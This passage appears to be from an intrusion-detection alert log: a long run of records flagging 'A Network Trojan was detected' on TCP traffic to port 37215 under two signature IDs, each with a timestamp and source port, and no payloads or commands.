                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.877967
                SID:2835222
                Source Port:51034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201970
                SID:2835222
                Source Port:38434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182194
                SID:2835222
                Source Port:43884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143601
                SID:2829579
                Source Port:54030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242806
                SID:2835222
                Source Port:54560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027676
                SID:2835222
                Source Port:45302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897246
                SID:2835222
                Source Port:44082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942236
                SID:2835222
                Source Port:42662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177664
                SID:2835222
                Source Port:37368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792758
                SID:2829579
                Source Port:44078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790831
                SID:2829579
                Source Port:41172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383409
                SID:2835222
                Source Port:52036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290546
                SID:2835222
                Source Port:49124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914560
                SID:2835222
                Source Port:38654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133860
                SID:2835222
                Source Port:55662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024217
                SID:2829579
                Source Port:52766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850484
                SID:2835222
                Source Port:33748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273644
                SID:2829579
                Source Port:48686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198276
                SID:2835222
                Source Port:39972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761431
                SID:2829579
                Source Port:38506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180154
                SID:2829579
                Source Port:45640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733071
                SID:2829579
                Source Port:58008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978817
                SID:2835222
                Source Port:54346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453815
                SID:2835222
                Source Port:41840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641728
                SID:2835222
                Source Port:33690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943760
                SID:2829579
                Source Port:44638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716546
                SID:2829579
                Source Port:41554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368389
                SID:2835222
                Source Port:46662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244334
                SID:2829579
                Source Port:53562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419898
                SID:2829579
                Source Port:36610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812760
                SID:2829579
                Source Port:59266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761460
                SID:2829579
                Source Port:38890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861960
                SID:2835222
                Source Port:54838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671500
                SID:2835222
                Source Port:52156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276547
                SID:2829579
                Source Port:53552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546274
                SID:2835222
                Source Port:39220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682653
                SID:2829579
                Source Port:35702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452117
                SID:2829579
                Source Port:47296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617257
                SID:2835222
                Source Port:51520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.094401
                SID:2829579
                Source Port:59270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229661
                SID:2829579
                Source Port:45356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181397
                SID:2829579
                Source Port:45128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790404
                SID:2829579
                Source Port:43248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986276
                SID:2829579
                Source Port:59612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703408
                SID:2835222
                Source Port:53002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940243
                SID:2829579
                Source Port:40170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862446
                SID:2835222
                Source Port:58110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.472830
                SID:2829579
                Source Port:37746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546675
                SID:2835222
                Source Port:44442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.582132
                SID:2835222
                Source Port:46012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615099
                SID:2829579
                Source Port:48612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244805
                SID:2835222
                Source Port:53240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718726
                SID:2835222
                Source Port:33376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941916
                SID:2835222
                Source Port:60568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942969
                SID:2829579
                Source Port:50332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364923
                SID:2829579
                Source Port:34550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074962
                SID:2835222
                Source Port:42058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564691
                SID:2835222
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253562
                SID:2835222
                Source Port:44088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681352
                SID:2829579
                Source Port:37558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276249
                SID:2835222
                Source Port:51700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011222
                SID:2835222
                Source Port:60408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149452
                SID:2835222
                Source Port:38430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971337
                SID:2829579
                Source Port:53778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.068405
                SID:2835222
                Source Port:57648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803939
                SID:2835222
                Source Port:47566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030612
                SID:2835222
                Source Port:47500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879223
                SID:2835222
                Source Port:54038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.334735
                SID:2829579
                Source Port:50168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073668
                SID:2835222
                Source Port:42166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849376
                SID:2829579
                Source Port:58228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520285
                SID:2835222
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998238
                SID:2829579
                Source Port:46096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548750
                SID:2829579
                Source Port:35540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052582
                SID:2829579
                Source Port:59016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827708
                SID:2835222
                Source Port:47644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411968
                SID:2835222
                Source Port:58794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383172
                SID:2835222
                Source Port:48738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763136
                SID:2835222
                Source Port:34130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150571
                SID:2835222
                Source Port:34396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368106
                SID:2829579
                Source Port:55238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678461
                SID:2829579
                Source Port:54130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829980
                SID:2835222
                Source Port:55506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369013
                SID:2829579
                Source Port:35644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.562973
                SID:2835222
                Source Port:39510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.033716
                SID:2829579
                Source Port:54984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761229
                SID:2835222
                Source Port:40382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366215
                SID:2829579
                Source Port:56014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.253474
                SID:2835222
                Source Port:58182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861346
                SID:2829579
                Source Port:42358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408080
                SID:2829579
                Source Port:35780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968582
                SID:2835222
                Source Port:39128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338264
                SID:2835222
                Source Port:50550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830238
                SID:2835222
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678640
                SID:2835222
                Source Port:49032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367516
                SID:2829579
                Source Port:33152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717180
                SID:2829579
                Source Port:45572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143496
                SID:2829579
                Source Port:37748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.643021
                SID:2829579
                Source Port:48328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.015359
                SID:2835222
                Source Port:40548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977571
                SID:2829579
                Source Port:42882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660562
                SID:2835222
                Source Port:51456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182848
                SID:2835222
                Source Port:41332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326535
                SID:2835222
                Source Port:34402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616385
                SID:2835222
                Source Port:48020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670346
                SID:2829579
                Source Port:56584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808433
                SID:2835222
                Source Port:34294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808077
                SID:2835222
                Source Port:59746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689653
                SID:2829579
                Source Port:34932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967858
                SID:2835222
                Source Port:33010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661477
                SID:2829579
                Source Port:50920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806313
                SID:2835222
                Source Port:50798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862478
                SID:2829579
                Source Port:39400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229586
                SID:2835222
                Source Port:51768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.183064
                SID:2835222
                Source Port:33322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143443
                SID:2829579
                Source Port:47392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149610
                SID:2829579
                Source Port:49904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147057
                SID:2829579
                Source Port:53944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618059
                SID:2835222
                Source Port:53668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718674
                SID:2829579
                Source Port:36188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071484
                SID:2829579
                Source Port:53164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.737899
                SID:2835222
                Source Port:48508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027813
                SID:2829579
                Source Port:52148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021637
                SID:2829579
                Source Port:53864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074096
                SID:2835222
                Source Port:53294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776589
                SID:2829579
                Source Port:44842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152600
                SID:2835222
                Source Port:53392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011823
                SID:2829579
                Source Port:58024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.549174
                SID:2829579
                Source Port:41440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979891
                SID:2829579
                Source Port:44626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022683
                SID:2835222
                Source Port:36220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366730
                SID:2835222
                Source Port:52556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967422
                SID:2835222
                Source Port:37582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230617
                SID:2835222
                Source Port:46740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.946968
                SID:2829579
                Source Port:38172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182731
                SID:2835222
                Source Port:42146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277267
                SID:2829579
                Source Port:35900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807694
                SID:2835222
                Source Port:45972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075114
                SID:2829579
                Source Port:56332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645839
                SID:2829579
                Source Port:46834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.760963
                SID:2835222
                Source Port:53042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762865
                SID:2829579
                Source Port:44292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.674905
                SID:2829579
                Source Port:46504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366028
                SID:2829579
                Source Port:51090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032989
                SID:2835222
                Source Port:36812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.089916
                SID:2835222
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725588
                SID:2835222
                Source Port:38516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410905
                SID:2835222
                Source Port:46392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.725096
                SID:2829579
                Source Port:34040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411448
                SID:2835222
                Source Port:44910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517590
                SID:2829579
                Source Port:54732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451159
                SID:2835222
                Source Port:34688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763193
                SID:2829579
                Source Port:39418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942875
                SID:2829579
                Source Port:60034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152579
                SID:2835222
                Source Port:41466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565309
                SID:2835222
                Source Port:48532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176938
                SID:2835222
                Source Port:46082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985769
                SID:2829579
                Source Port:33104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.542917
                SID:2835222
                Source Port:60524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071429
                SID:2829579
                Source Port:38636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977199
                SID:2835222
                Source Port:55100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148758
                SID:2835222
                Source Port:59358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368891
                SID:2829579
                Source Port:48322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185384
                SID:2829579
                Source Port:50616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986238
                SID:2829579
                Source Port:47364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762282
                SID:2835222
                Source Port:52970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179418
                SID:2829579
                Source Port:41180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944241
                SID:2829579
                Source Port:55340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149906
                SID:2835222
                Source Port:48672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344411
                SID:2835222
                Source Port:37516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.807758
                SID:2835222
                Source Port:55108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705144
                SID:2829579
                Source Port:35070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943569
                SID:2835222
                Source Port:53252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013264
                SID:2835222
                Source Port:51698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.273410
                SID:2829579
                Source Port:48870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967393
                SID:2835222
                Source Port:49940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848203
                SID:2829579
                Source Port:42536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670838
                SID:2835222
                Source Port:50394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503222
                SID:2835222
                Source Port:60898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501668
                SID:2829579
                Source Port:57452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830946
                SID:2829579
                Source Port:42018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759726
                SID:2829579
                Source Port:35592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564764
                SID:2829579
                Source Port:49340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848161
                SID:2835222
                Source Port:42268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519770
                SID:2829579
                Source Port:51572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829898
                SID:2835222
                Source Port:58758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897141
                SID:2835222
                Source Port:49618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504537
                SID:2829579
                Source Port:47998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.569487
                SID:2829579
                Source Port:48292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022414
                SID:2829579
                Source Port:52502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968868
                SID:2829579
                Source Port:59034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276827
                SID:2829579
                Source Port:47796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112251
                SID:2835222
                Source Port:58134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014117
                SID:2829579
                Source Port:49594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.028042
                SID:2829579
                Source Port:56356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.112159
                SID:2835222
                Source Port:42480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717884
                SID:2835222
                Source Port:59784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
